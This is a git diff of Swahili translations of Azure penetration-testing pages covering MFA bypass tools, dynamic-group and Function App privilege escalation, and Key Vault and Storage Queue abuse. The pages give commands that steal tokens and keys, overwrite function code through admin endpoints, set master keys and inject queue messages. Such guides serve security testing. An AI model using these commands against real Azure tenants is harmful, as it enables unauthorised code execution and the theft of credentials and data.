Chombo [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) kinaweza pia kutumika kwa madhumuni sawa ingawa kinaonekana hakijatunzwa. -Chombo [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kinaweza pia kutumika kujaribu hizi ulinzi na kuona ikiwa inawezekana kupita MFAs au vizuizi, lakini chombo hiki kinatumika kutoka kwa mtazamo wa **whitebox**. Kwanza unahitaji kupakua orodha ya Programu zilizoruhusiwa katika mpangilio na kisha itajaribu kuingia ndani yao. +Chombo [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kinaweza pia kutumika kujaribu hizi ulinzi na kuona ikiwa inawezekana kupita MFAs au vizuizi, lakini chombo hiki kinatumika kutoka kwa mtazamo wa **whitebox**. Kwanza unahitaji kupakua orodha ya Programu zilizoruhusiwa katika tenant na kisha itajaribu kuingia ndani yao. ## Mipango Mingine ya Az MFA -### Sauti ya Kengele +### Kengele ya simu Chaguo moja la Azure MFA ni **kupokea simu katika nambari ya simu iliyowekwa** ambapo itamwuliza mtumiaji **kutuma herufi `#`**. > [!CAUTION] -> Kwa kuwa herufi ni tu **sauti**, mshambuliaji anaweza **kuathiri** ujumbe wa **voicemail** wa nambari ya simu, kuweka kama ujumbe **sauti ya `#`** na kisha, wakati wa kuomba MFA hakikisha kwamba **simu ya waathiriwa inatumika** (ikiitafuta) ili simu ya Azure irejeleze kwenye voicemail. +> Kwa kuwa herufi ni **sauti tu**, mshambuliaji anaweza **kuathiri** ujumbe wa **voicemail** wa nambari ya simu, kuweka kama ujumbe **sauti ya `#`** na kisha, wakati wa kuomba MFA hakikisha kwamba **simu ya waathiriwa inashughulika** (ikiitafuta) ili simu ya Azure irejeleze kwenye voicemail. ### Vifaa Vinavyokubalika -Sera mara nyingi zinahitaji kifaa kinachokubalika au MFA, hivyo **mshambuliaji anaweza kujiandikisha kifaa kinachokubalika**, kupata **token ya PRT** na **kupita hivi hivyo MFA**. +Sera mara nyingi huomba kifaa kinachokubalika au MFA, hivyo **mshambuliaji anaweza kujiandikisha kifaa kinachokubalika**, kupata token ya **PRT** na **kupita hivi hivyo MFA**. -Anza kwa kujiandikisha **kifaa kinachokubalika katika Intune**, kisha **pata PRT** na: +Anza kwa kujiandikisha kifaa **kinachokubalika katika Intune**, kisha **pata PRT** kwa: ```powershell $prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\.pfx -Credentials $credentials @@ -94,19 +94,19 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken ``` -Find more information about this kind of attack in the following page: +Pata maelezo zaidi kuhusu aina hii ya shambulio katika ukurasa ufuatao: {{#ref}} ../../az-lateral-movement-cloud-on-prem/pass-the-prt.md {{#endref}} -## Tooling +## Zana ### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) -Hii script inapata baadhi ya akidi za mtumiaji na kuangalia kama inaweza kuingia katika baadhi ya programu. +Script hii inapata baadhi ya akidi za mtumiaji na kuangalia kama inaweza kuingia katika baadhi ya programu. -Hii ni muhimu kuona kama **huhitajiki MFA kuingia katika baadhi ya programu** ambazo unaweza baadaye kutumia vibaya ili **kuinua haki**. +Hii ni muhimu kuona kama **huhitajiki MFA kuingia katika baadhi ya programu** ambazo unaweza baadaye kuzitumia ili **kuinua haki**. ### [roadrecon](https://github.com/dirkjanm/ROADtools) @@ -123,10 +123,10 @@ Invoke-MFASweep -Username -Password ``` ### [ROPCI](https://github.com/wunderwuzzi23/ropci) -Chombo hiki kimeweza kusaidia kubaini njia za kupita MFA na kisha kutumia APIs katika wapangaji wengi wa uzalishaji wa AAD, ambapo wateja wa AAD walidhani walikuwa na MFA iliyotekelezwa, lakini uthibitisho wa msingi wa ROPC ulifanikiwa. +Zana hii imesaidia kubaini njia za kupita MFA na kisha kutumia APIs katika wapangaji wengi wa uzalishaji wa AAD, ambapo wateja wa AAD walidhani walikuwa na MFA iliyotekelezwa, lakini uthibitishaji wa msingi wa ROPC ulifanikiwa. > [!TIP] -> Unahitaji kuwa na ruhusa za kuorodhesha programu zote ili uweze kuzalisha orodha ya programu za kushambulia kwa nguvu. +> Unahitaji kuwa na ruhusa za kuorodhesha programu zote ili uweze kuunda orodha ya programu za kushambulia kwa nguvu. ```bash ./ropci configure ./ropci apps list --all --format json -o apps.json @@ -135,7 +135,7 @@ Chombo hiki kimeweza kusaidia kubaini njia za kupita MFA na kisha kutumia APIs k ``` ### [donkeytoken](https://github.com/silverhack/donkeytoken) -Donkey token ni seti ya kazi ambazo zina lengo la kusaidia washauri wa usalama wanaohitaji kuthibitisha Sera za Ufikiaji wa Masharti, majaribio ya portali za Microsoft zenye 2FA, n.k.. +Donkey token ni seti ya kazi ambazo zina lengo la kusaidia washauri wa usalama wanaohitaji kuthibitisha Sera za Ufikiaji wa Masharti, majaribio ya portali za Microsoft zilizo na 2FA, n.k..
git clone https://github.com/silverhack/donkeytoken.git
 Import-Module '.\donkeytoken' -Force
@@ -148,12 +148,12 @@ $password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
 $cred = New-Object System.Management.Automation.PSCredential($username, $password)
 Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
 ```
-Kwa sababu ya **Azure** **portal** **haijakandamizwa**, inawezekana **kukusanya token kutoka kwa kiunganishi cha portal ili kufikia huduma yoyote iliyogunduliwa** na utekelezaji wa awali. Katika kesi hii, Sharepoint ilitambuliwa, na token ya kuifikia inahitajika:
+Kwa sababu **Azure** **portal** **haijakandamizwa**, inawezekana **kukusanya token kutoka kwa kiunganishi cha portal ili kufikia huduma yoyote iliyogunduliwa** na utekelezaji wa awali. Katika kesi hii, Sharepoint ilitambuliwa, na token ya kuifikia inahitajika:
 ```powershell
 $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
 Read-JWTtoken -token $token.access_token
 ```
-Kukisia kwamba token ina ruhusa Sites.Read.All (kutoka Sharepoint), hata kama huwezi kufikia Sharepoint kutoka mtandao kwa sababu ya MFA, inawezekana kutumia token hiyo kufikia faili kwa kutumia token iliyozalishwa:
+Ikiwa token ina ruhusa Sites.Read.All (kutoka Sharepoint), hata kama huwezi kufikia Sharepoint kutoka mtandao kwa sababu ya MFA, inawezekana kutumia token hiyo kufikia faili kwa kutumia token iliyozalishwa:
 ```powershell
 $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
 ```
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
index ea87315ce..4b56bbd40 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
@@ -4,24 +4,24 @@
 
 ## Basic Information
 
-**Dynamic groups** ni vikundi ambavyo vina seti ya **rules** zilizowekwa na watumiaji wote au **devices** wanaolingana na sheria hizo wanaongezwa kwenye kundi. Kila wakati **attribute** ya mtumiaji au kifaa inapo **badilishwa**, sheria za dynamic zinarejelewa. Na wakati **new rule** inapo **undwa** vifaa vyote na watumiaji vinakaguliwa.
+**Dynamic groups** ni vikundi ambavyo vina seti ya **rules** zilizowekwa na watumiaji au vifaa vyote vinavyolingana na sheria hizo vinajumuishwa kwenye kundi. Kila wakati **attribute** ya mtumiaji au kifaa inapo **badilishwa**, sheria za dynamic zinarejelewa. Na wakati **sheria mpya** inapo **undwa**, vifaa vyote na watumiaji vinakaguliwa.
 
-Dynamic groups zinaweza kuwa na **Azure RBAC roles** zilizotolewa kwao, lakini **sio possible** kuongeza **AzureAD roles** kwa dynamic groups.
+Vikundi vya dynamic vinaweza kuwa na **Azure RBAC roles** zilizotolewa kwao, lakini **haiwezekani** kuongeza **AzureAD roles** kwenye vikundi vya dynamic.
 
 Kipengele hiki kinahitaji leseni ya Azure AD premium P1.
 
 ## Privesc
 
-Kumbuka kwamba kwa default mtumiaji yeyote anaweza kuwalika wageni katika Azure AD, hivyo, ikiwa **rule** ya dynamic group inatoa **permissions** kwa watumiaji kulingana na **attributes** ambazo zinaweza **set** katika **guest** mpya, inawezekana **kuunda guest** mwenye attributes hizi na **escalate privileges**. Pia inawezekana kwa mgeni kusimamia wasifu wake mwenyewe na kubadilisha attributes hizi.
+Kumbuka kwamba kwa default mtumiaji yeyote anaweza kuwalika wageni katika Azure AD, hivyo, ikiwa sheria ya kundi la dynamic inatoa **permissions** kwa watumiaji kulingana na **attributes** ambazo zinaweza **kuwekwa** kwa **mgeni** mpya, inawezekana **kuunda mgeni** mwenye attributes hizi na **kuinua mamlaka**. Pia inawezekana kwa mgeni kusimamia wasifu wake mwenyewe na kubadilisha attributes hizi.
 
 Pata vikundi vinavyoruhusu uanachama wa Dynamic: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`**
 
 ### Example
 
 - **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")`
-- **Rule description**: Mtumiaji yeyote wa Guest mwenye barua pepe ya pili yenye mfuatano 'security' ataongezwa kwenye kundi
+- **Rule description**: Mtumiaji yeyote wa Mgeni mwenye barua pepe ya pili yenye maandiko 'security' ataongezwa kwenye kundi
 
-Kwa barua pepe ya mtumiaji wa Guest, kubali mwaliko na angalia mipangilio ya **mtumiaji huyo** katika [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
+Kwa barua pepe ya mtumiaji wa Mgeni, kubali mwaliko na angalia mipangilio ya **mtumiaji huyo** katika [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
 Kwa bahati mbaya, ukurasa haukuruhusu kubadilisha thamani za attribute hivyo tunahitaji kutumia API:
 ```powershell
 # Login with the gust user
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
index a727a3642..110ec4e68 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -4,7 +4,7 @@
 
 ## Function Apps
 
-Tafadhali angalia ukurasa ufuatao kwa maelezo zaidi:
+Angalia ukurasa ufuatao kwa maelezo zaidi:
 
 {{#ref}}
 ../az-services/az-function-apps.md
@@ -14,11 +14,11 @@ Tafadhali angalia ukurasa ufuatao kwa maelezo zaidi:
 
 Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi inawezekana kupata **kontena tofauti** (za kawaida au zenye majina yaliyowekwa awali) ambayo yanaweza kuwa na **msimbo unaotekelezwa na kazi**.
 
-Mara tu unapopata mahali ambapo msimbo wa kazi umehifadhiwa ikiwa una ruhusa za kuandika juu yake unaweza kufanya kazi itekeleze msimbo wowote na kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo.
+Mara tu unapopata mahali ambapo msimbo wa kazi umehifadhiwa ikiwa una ruhusa za kuandika juu yake unaweza kufanya kazi itekeleze msimbo wowote na kupandisha hadhi kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo.
 
-- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE)` 
+- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`)
 
-Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya sehemu ya faili. Kwa ufikiaji wa kutosha inawezekana kubadilisha faili ya msimbo na **kufanya kazi ipakue msimbo wowote** ikiruhusu kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi.
+Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya file share. Kwa ufikiaji wa kutosha inawezekana kubadilisha faili ya msimbo na **kufanya kazi ipakue msimbo wowote** ikiruhusu kupandisha hadhi kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi.
 
 Njia hii ya kutekeleza kawaida huweka mipangilio **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** na **`WEBSITE_CONTENTSHARE`** ambazo unaweza kupata kutoka 
 ```bash
@@ -26,10 +26,10 @@ az functionapp config appsettings list \
 --name  \
 --resource-group 
 ```
-Hizi mipangilio zitakuwa na **Storage Account Key** ambayo Function inaweza kutumia kufikia msimbo.
+Mikakati hiyo itakuwa na **Mfunguo wa Akaunti ya Hifadhi** ambao Kazi inaweza kutumia kufikia msimbo.
 
 > [!CAUTION]
-> Kwa ruhusa ya kutosha kuungana na File Share na **kubadilisha skripti** inayotumika, inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa.
+> Kwa ruhusa ya kutosha kuungana na File Share na **kubadilisha skripti** inayotumika, inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha ruhusa.
 
 Mfano ufuatao unatumia macOS kuungana na file share, lakini inashauriwa pia kuangalia ukurasa ufuatao kwa maelezo zaidi kuhusu file shares:
 
@@ -47,9 +47,9 @@ open "smb://.file.core.windows.net/"
 ```
 - **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
 
-Ni kawaida pia kupata **zip releases** ndani ya folda `function-releases` ya kontena la Akaunti ya Hifadhi ambayo programu ya kazi inatumia katika kontena **kawaida inaitwa `function-releases`**.
+Ni kawaida pia kupata **zip releases** ndani ya folda `function-releases` ya kontena la Akaunti ya Hifadhi ambayo programu ya kazi inatumia katika kontena **ambalo kwa kawaida linaitwa `function-releases`**.
 
-Kawaida njia hii ya kutekeleza itapanga config ya `WEBSITE_RUN_FROM_PACKAGE` katika:
+Kwa kawaida, njia hii ya kutekeleza itapanga `WEBSITE_RUN_FROM_PACKAGE` config katika:
 ```bash
 az functionapp config appsettings list \
 --name  \
@@ -58,11 +58,11 @@ az functionapp config appsettings list \
 Hii config kwa kawaida itakuwa na **SAS URL ya kupakua** msimbo kutoka kwa Akaunti ya Hifadhi.
 
 > [!CAUTION]
-> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linahifadhi msimbo katika zip** inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha ruhusa.
+> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linashikilia msimbo katika zip** inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha ruhusa.
 
 - **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` 
 
-Kama ilivyo katika kesi ya awali, ikiwa usambazaji unafanywa kupitia Github Actions inawezekana kupata folda **`github-actions-deploy`** katika Akaunti ya Hifadhi inayohifadhi zip ya msimbo na SAS URL kwa zip katika mipangilio `WEBSITE_RUN_FROM_PACKAGE`.
+Kama ilivyo katika kesi ya awali, ikiwa uhamasishaji unafanywa kupitia Github Actions inawezekana kupata folda **`github-actions-deploy`** katika Akaunti ya Hifadhi inayoshikilia zip ya msimbo na SAS URL kwa zip katika mipangilio `WEBSITE_RUN_FROM_PACKAGE`.
 
 - **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`)
 
@@ -98,7 +98,7 @@ unsquashfs -l "/tmp/scm-latest-.zip"
 mkdir /tmp/fs
 unsquashfs -d /tmp/fs /tmp/scm-latest-.zip
 ```
-Ni pia inawezekana kupata **funguo za master na functions** zilizohifadhiwa katika akaunti ya hifadhi katika kontena **`azure-webjobs-secrets`** ndani ya folda **``** katika faili za JSON unazoweza kupata ndani.
+Ni possible pia kupata **funguo za master na functions** zilizohifadhiwa katika akaunti ya hifadhi ndani ya kontena **`azure-webjobs-secrets`** ndani ya folda **``** katika faili za JSON unazoweza kupata ndani yake.
 
 > [!CAUTION]
 > Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linabeba msimbo katika faili la nyongeza ya zip** (ambalo kwa kweli ni **`squashfs`**) inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa.
@@ -118,11 +118,11 @@ az storage blob upload \
 ```
 ### Microsoft.Web/sites/host/listkeys/action
 
-Ruhusa hii inaruhusu kuorodhesha funguo za kazi, funguo kuu na funguo za mfumo, lakini si funguo za mwenyeji, za kazi iliyotajwa na:
+Ruhusa hii inaruhusu kuorodhesha funguo za kazi, funguo kuu na funguo za mfumo, lakini si funguo za mwenyeji, za kazi iliyotajwa kwa:
 ```bash
 az functionapp keys list --resource-group  --name 
 ```
-Na funguo kuu, pia inawezekana kupata msimbo wa chanzo katika URL kama:
+Kwa funguo kuu, pia inawezekana kupata msimbo wa chanzo katika URL kama:
 ```bash
 # Get "script_href" from
 az rest --method GET \
@@ -145,13 +145,13 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro
 ```
 ### Microsoft.Web/sites/functions/listKeys/action
 
-Ruhusa hii inaruhusu kupata funguo za mwenyeji, za kazi iliyoainishwa na:
+Ruhusa hii inaruhusu kupata funguo za mwenyeji, za kazi iliyotajwa na:
 ```bash
 az rest --method POST --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//listKeys?api-version=2022-03-01"
 ```
 ### Microsoft.Web/sites/host/functionKeys/write
 
-Ruhusa hii inaruhusu kuunda/update funguo za kazi za kazi iliyoainishwa na:
+Ruhusa hii inaruhusu kuunda/update funguo ya kazi ya kazi iliyoainishwa na:
 ```bash
 az functionapp keys set --resource-group  --key-name  --key-type functionKeys --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
@@ -166,13 +166,13 @@ az functionapp keys set --resource-group  --key-name  --key
 
 ### Microsoft.Web/sites/host/systemKeys/write
 
-Ruhusa hii inaruhusu kuunda/update funguo ya mfumo wa kazi kwa kazi iliyoainishwa na:
+Ruhusa hii inaruhusu kuunda/update funguo za mfumo kwa kazi iliyoainishwa na:
 ```bash
 az functionapp keys set --resource-group  --key-name  --key-type masterKey --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
 ### Microsoft.Web/sites/config/list/action
 
-Ruhusa hii inaruhusu kupata mipangilio ya kazi. Ndani ya mipangilio hii inaweza kuwa na uwezekano wa kupata thamani za msingi **`AzureWebJobsStorage`** au **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** ambazo zina **funguo ya akaunti ya kufikia uhifadhi wa blob wa kazi kwa ruhusa KAMILI**.
+Ruhusa hii inaruhusu kupata mipangilio ya kazi. Ndani ya hizi mipangilio inaweza kuwa na uwezo wa kupata thamani za msingi **`AzureWebJobsStorage`** au **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** ambazo zina **funguo ya akaunti ya kufikia uhifadhi wa blob wa kazi hiyo kwa ruhusa KAMILI**.
 ```bash
 az functionapp config appsettings list --name  --resource-group 
 ```
@@ -193,7 +193,7 @@ az functionapp config appsettings list \
 --name  \
 --resource-group 
 ```
-- Tengeneza msimbo unayotaka kazi ifanye na uweke hadharani
+- Unda msimbo unayotaka kazi ifanye na uweke hadharani
 ```bash
 # Write inside /tmp/web/function_app.py the code of the function
 cd /tmp/web/function_app.py
@@ -215,7 +215,7 @@ az rest --method PUT \
 ```
 ### Microsoft.Web/sites/hostruntime/vfs/write
 
-Kwa ruhusa hii ni **uwezekano wa kubadilisha msimbo wa programu** kupitia konsoli ya wavuti (au kupitia kiunganishi cha API kinachofuata):
+Kwa ruhusa hii ni **uwezekano wa kubadilisha msimbo wa programu** kupitia konsoli ya wavuti (au kupitia kiunganishi hiki cha API):
 ```bash
 # This is a python example, so we will be overwritting function_app.py
 # Store in /tmp/body the raw python code to put in the function
@@ -226,7 +226,7 @@ az rest --method PUT \
 ```
 ### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)
 
-Hii ruhusa inaruhusu kuorodhesha wasifu wote wa uchapishaji ambao kimsingi unajumuisha **basic auth credentials**:
+Ruhusa hizi zinaruhusu kuorodhesha wasifu wote wa uchapishaji ambao kimsingi unajumuisha **basic auth credentials**:
 ```bash
 # Get creds
 az functionapp deployment list-publishing-profiles \
@@ -234,15 +234,15 @@ az functionapp deployment list-publishing-profiles \
 --resource-group  \
 --output json
 ```
-Nyingine chaguo ingekuwa kuweka akiba zako mwenyewe na kuzitumia kwa kutumia:
+Chaguo lingine lingekuwa kuweka akreditivu zako mwenyewe na kuzitumia kwa kutumia:
 ```bash
 az functionapp deployment user set \
 --user-name DeployUser123456 g \
 --password 'P@ssw0rd123!'
 ```
-- Ikiwa **REDACTED** akreditif
+- Ikiwa **REDACTED** akidi
 
-Ikiwa unaona kwamba akreditif hizo ni **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la uthibitishaji wa msingi wa SCM** na kwa hiyo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
+Ikiwa unaona kwamba akidi hizo ni **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la uthibitishaji wa msingi wa SCM** na kwa hiyo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
 ```bash
 # Enable basic authentication for SCM
 az rest --method PUT \
@@ -264,7 +264,7 @@ az rest --method PUT \
 ```
 - **Method SCM**
 
-Kisha, unaweza kufikia na hizi **basic auth credentials to the SCM URL** ya programu yako ya kazi na kupata thamani za mabadiliko ya env:
+Kisha, unaweza kufikia na hizi **basic auth credentials kwa URL ya SCM** ya programu yako ya kazi na kupata thamani za mabadiliko ya env:
 ```bash
 # Get settings values
 curl -u ':' \
@@ -275,15 +275,15 @@ zip function_app.zip function_app.py # Your code in function_app.py
 curl -u ':' -X POST --data-binary "@" \
 https://.scm.azurewebsites.net/api/zipdeploy
 ```
-_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$`._
+_Note kwamba **jina la mtumiaji wa SCM** kwa kawaida ni herufi "$" ikifuatiwa na jina la programu, hivyo: `$`._
 
-You can also access the web page from `https://.scm.azurewebsites.net/BasicAuth`
+Unaweza pia kufikia ukurasa wa wavuti kutoka `https://.scm.azurewebsites.net/BasicAuth`
 
-The settings values contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account.
+Thamani za mipangilio zinajumuisha **AccountKey** ya akaunti ya hifadhi inayohifadhi data ya programu ya kazi, ikiruhusu kudhibiti akaunti hiyo ya hifadhi.
 
-- **Method FTP**
+- **Njia ya FTP**
 
-Connect to the FTP server using:
+Unganisha na seva ya FTP ukitumia:
 ```bash
 # macOS install lftp
 brew install lftp
@@ -301,7 +301,7 @@ _Note that the **FTP username** is usually in the format \\\$\.azurewebsites.net/admin/host/systemkeys/_master" \
 ```
 ### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)
 
-Hii ruhusa inaruhusu **kuwezesha kazi** ambazo zinaweza kuwa zimezimwa (au kuzizima).
+Ruhusa hizi zinaruhusu **kuwezesha kazi** ambazo zinaweza kuwa zimezimwa (au kuzizima).
 ```bash
 # Enable a disabled function
 az functionapp config appsettings set \
@@ -338,7 +338,7 @@ az functionapp config appsettings set \
 --resource-group  \
 --settings "AzureWebJobs.http_trigger1.Disabled=false"
 ```
-Ni pia inawezekana kuona kama kazi imewezeshwa au kuzuiliwa katika URL ifuatayo (ukitumia ruhusa iliyo katika mabano):
+Inawezekana pia kuona kama kazi imewezeshwa au imezuiliwa katika URL ifuatayo (ukitumia ruhusa iliyo katika mabano):
 ```bash
 az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//properties/state?api-version=2024-04-01"
 ```
@@ -352,7 +352,7 @@ az functionapp config container set --name  \
 ```
 ### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)
 
-Kwa ruhusa hizi inawezekana **kuunganisha utambulisho wa mtumiaji ulioendeshwa na kazi**. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji ulioendeshwa.
+Kwa ruhusa hizi inawezekana **kuunganisha utambulisho wa mtumiaji aliyejisimamia mpya kwa kazi**. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji aliyejisimamia.
 ```bash
 az functionapp identity assign \
 --name  \
@@ -361,9 +361,9 @@ az functionapp identity assign \
 ```
 ### Remote Debugging
 
-Ni uwezekano wa kuungana ili kudhibiti kazi ya Azure inayotembea kama [**ilivyoelezwa katika nyaraka**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa default Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu.
+Inawezekana pia kuungana ili kudebug kazi inayotembea ya Azure kama [**ilivyoelezwa katika nyaraka**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa kawaida Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu.
 
-Ni uwezekano wa kuangalia ikiwa Kazi ina udhibiti ulioanzishwa kwa:
+Inawezekana kuangalia ikiwa Kazi ina uwezo wa kudebug kwa:
 ```bash
 az functionapp show --name  --resource-group 
 ```
@@ -373,8 +373,8 @@ az functionapp config set --remote-debugging-enabled=True --name  --re
 ```
 ### Badilisha Github repo
 
-Nilijaribu kubadilisha Github repo ambapo uhamasishaji unafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **msimbo mpya haukupakuliwa** (labda kwa sababu inatarajia Github Action kuboresha msimbo).\
-Zaidi ya hayo, **kitambulisho cha utambulisho wa usimamizi hakikubadilishwa** kuruhusu hazina mpya, hivyo inaonekana kwamba hii si ya manufaa sana.
+Nilijaribu kubadilisha Github repo kutoka ambapo kutekelezwa kunafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **msimbo mpya haukupakuliwa** (labda kwa sababu inategemea Github Action kuboresha msimbo).\
+Zaidi ya hayo, **kitambulisho cha usimamizi wa shirikisho hakikubadilishwa** kuruhusu hazina mpya, hivyo inaonekana kwamba hii si ya manufaa sana.
 ```bash
 # Remove current
 az functionapp deployment source delete \
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
index 2814fecaa..aad58c8e8 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
@@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu huduma hii angalia:
 
 ### Microsoft.KeyVault/vaults/write
 
-Mshambuliaji mwenye ruhusa hii ataweza kubadilisha sera ya vault ya funguo (vault ya funguo lazima itumie sera za ufikiaji badala ya RBAC).
+Mshambuliaji mwenye ruhusa hii ataweza kubadilisha sera ya vault ya funguo (vault ya funguo inapaswa kutumia sera za ufikiaji badala ya RBAC).
 ```bash
 # If access policies in the output, then you can abuse it
 az keyvault show --name 
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
index 339329292..9102e40ec 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
@@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia:
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
 
-Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuyapiga alama kama yamechakatwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi.
+Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa umeshughulikiwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi.
 ```bash
 az storage message peek --queue-name  --account-name 
 ```
@@ -20,19 +20,19 @@ az storage message peek --queue-name  --account-name  --account-name 
 ```
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
 
-Kwa ruhusa hii, mshambuliaji anaweza kuongeza ujumbe mpya kwenye Azure Storage Queue. Hii inawaruhusu kuingiza data mbaya au isiyoidhinishwa kwenye foleni, ambayo inaweza kusababisha kuchochea vitendo visivyokusudiwa au kuharibu huduma za chini zinazoshughulikia ujumbe.
+Kwa ruhusa hii, mshambuliaji anaweza kuongeza ujumbe mpya kwenye Azure Storage Queue. Hii inawaruhusu kuingiza data mbaya au isiyoidhinishwa kwenye foleni, ambayo inaweza kusababisha kuchochea vitendo visivyokusudiwa au kuharibu huduma zinazoshughulikia ujumbe.
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 ```
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
 
